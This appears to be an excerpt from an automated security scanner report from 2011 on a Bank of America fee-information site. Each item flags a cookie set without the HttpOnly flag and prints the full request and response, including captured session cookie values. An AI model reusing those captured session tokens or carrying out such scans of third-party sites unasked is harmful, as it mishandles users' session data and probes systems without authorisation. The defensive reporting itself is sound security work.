SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 12:58:47 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000GvCKcO95bKlD7swNsDBseos:14b1t9p98; Path=/; Secure
Set-Cookie: JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 33743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

...[SNIP]...

4.7. http://factsaboutfees.bankofamerica.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852

Response

4.8. http://factsaboutfees.bankofamerica.com/assets/css/print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/css/print.css HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:20 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c227-af-4ab460cb39a00"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:20 GMT
Vary: Accept-Encoding
Content-Length: 175
Content-Type: text/css
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:20 GMT;path=/

body{font:12pt Times,serif;}#pageHeader,#siteNavigation,#siteMap,#sideBar,#costsWidget,img,.tabNav,#skipLink,#feeEducation{display:none;}h1 img,#contentWrapper{display:block;}

4.9. http://factsaboutfees.bankofamerica.com/assets/css/screen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/css/screen.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/css/screen.css HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:12:59 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:58 GMT
ETag: "24c226-ad18-4ab460cd21e80"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:12:59 GMT
Vary: Accept-Encoding
Content-Length: 44312
Content-Type: text/css
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, str
...[SNIP]...

4.10. http://factsaboutfees.bankofamerica.com/assets/css/ui-lightness/jquery-ui-1.7.2.custom.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/css/ui-lightness/jquery-ui-1.7.2.custom.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/css/ui-lightness/jquery-ui-1.7.2.custom.css HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:12:59 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c2a6-6b88-4ab460c951580"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:12:59 GMT
Vary: Accept-Encoding
Content-Length: 27528
Content-Type: text/css
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
*/

/* Layout helpers
----
...[SNIP]...

4.11. http://factsaboutfees.bankofamerica.com/assets/img/ajax-loader.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/ajax-loader.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/ajax-loader.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:03 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1fd-2a1-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 673
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:03 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

GIF89a................>>>...]]]{{{...!..NETSCAPE2.0.....!..Created with ajaxload.info.!..
...,..........3....0.Ik.c.:....N.f E.1.......`..q.-[.9...9...Jk.H..!..
...,..........4....N.! .......DqBQT`1
...[SNIP]...

4.12. http://factsaboutfees.bankofamerica.com/assets/img/bc_contentBlock.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bc_contentBlock.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bc_contentBlock.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
